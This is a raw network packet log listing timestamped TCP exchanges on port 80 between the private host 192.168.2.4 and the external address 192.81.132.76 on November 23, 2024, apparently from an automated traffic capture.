Nov 23, 2024 12:47:17.496617079 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.497106075 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.500844002 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.500880957 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.501245022 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.504595041 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.504688025 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.505043030 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.509507895 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.509617090 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.509967089 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.514408112 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.514487982 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.514580965 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.519336939 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.519395113 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.519748926 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.524198055 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.524348974 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.528408051 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.531359911 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.531395912 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.531524897 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.534934044 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.535120964 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.536389112 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.539829969 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.540002108 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.540672064 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.544723988 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.544894934 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.545008898 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.549588919 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.549751997 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.550210953 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.554414034 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.554572105 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.554860115 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.559449911 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.559607029 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.559736013 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.563415051 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.563432932 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.563724995 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.568169117 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.568310022 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.568829060 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.603344917 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.660336018 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.683701038 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.683720112 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.684345007 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.684739113 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.684850931 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.688652992 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.688697100 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.688746929 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.692435026 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.694464922 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.694483995 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.694603920 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.697312117 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.697599888 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.700376034 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.701246977 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.701416969 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.705123901 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.705276966 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.705302000 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.708334923 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.708834887 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.708998919 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.710097075 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.712733984 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.712753057 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.714967012 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.716475964 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.716656923 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.719765902 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.720271111 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.720451117 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.724024057 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.724181890 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.724349022 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.726867914 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.726996899 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.728610992 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.730590105 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.730691910 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.733093023 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.734457016 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.734517097 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.737159014 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.738270044 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.738352060 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.740801096 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.741987944 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.742099047 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.744352102 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.745774984 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.745878935 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.748333931 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.749633074 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.749763012 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.751014948 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.753431082 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.753485918 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.757145882 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.757185936 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.757236004 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.760375977 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.760984898 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.761039972 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.764369965 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.764786959 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.764874935 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.768351078 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.768558979 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.768639088 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.771420002 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.772315025 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.772471905 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.776101112 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.776174068 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.776269913 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.776415110 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.779928923 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.834876060 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.888794899 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.888943911 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.889009953 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.890396118 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.890882969 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.890934944 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.891041040 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.894082069 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.894135952 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.894223928 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.897028923 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.897095919 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.897186995 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.900144100 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.900228024 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.900280952 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.903152943 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.903168917 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.903218985 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.905318022 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.905333042 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.905416965 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.908946991 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.909032106 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.909109116 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.911930084 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.911946058 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.912053108 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.912106991 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.912128925 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.912182093 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.915189981 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.915205956 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.915249109 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.917892933 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.917965889 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.918245077 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.921041965 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.921056986 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.921140909 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.923980951 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.924026012 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.924156904 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.926964998 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.926980972 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.927059889 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.929917097 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.929997921 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.930087090 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.932883978 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.932900906 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.932945013 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.935703993 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.935772896 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.935884953 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.938724041 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.938880920 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.938908100 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.940762997 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.940839052 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.940871000 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.943746090 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.943799973 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.943805933 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.946690083 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.946768045 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.946805954 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.951196909 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.951211929 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.951277971 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.954065084 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.954168081 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.954229116 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.956518888 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.956585884 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.956675053 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.959438086 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.959568977 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.959755898 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.962496042 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.962557077 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.962663889 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.965500116 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.965559959 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.965673923 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.968529940 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.968619108 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.968671083 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.971437931 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.971556902 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.971617937 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.974536896 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.974699974 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.974704027 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.977302074 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.977396965 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.977657080 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.980532885 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.980551958 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.980592966 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.983290911 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.983335018 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.983488083 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.986262083 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.986320972 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.986434937 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.988312006 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.988404036 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.988425016 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.991522074 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.991625071 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.992604017 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.995234966 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.995301008 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.995409966 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.998315096 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.998330116 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.998368025 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.001172066 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.001281023 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.601258993 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.601372004 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.601428032 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.602088928 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.602216959 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.602267981 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.604012966 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.604157925 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.604212999 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.605935097 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.606085062 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.606146097 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.607795954 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.607889891 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.607939005 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.609684944 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.609808922 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.609859943 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.611639023 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.611814022 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.611862898 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.613570929 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.613728046 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.613831997 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.615488052 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.615639925 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.615688086 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.617432117 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.617552042 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.617600918 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.619350910 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.619473934 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.619543076 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.621393919 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.621611118 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.621670008 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.623244047 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.623429060 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.623477936 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.625122070 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.625252962 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.625303984 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.627068043 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.627163887 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.627249956 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.628993988 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.629096031 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.629146099 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.630901098 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.631027937 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.631076097 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.632827997 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.632950068 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.633002996 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.634764910 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.634872913 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.634919882 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.636838913 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.636966944 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.637017965 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.638653040 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.638772964 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.638827085 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.640598059 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.640753031 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.640799046 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.643255949 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.643457890 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.643510103 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.644632101 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.644701958 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.644747972 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.646325111 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.646449089 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.646496058 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.648241997 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.648359060 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.648407936 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.650185108 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.650285959 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.650340080 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.652091980 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.652206898 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.652252913 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.654010057 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.654159069 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.654203892 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.655986071 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.656081915 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.656130075 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:18.657932043 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:18.658003092 CET	80	49735	192.81.132.76	192.168.2.4
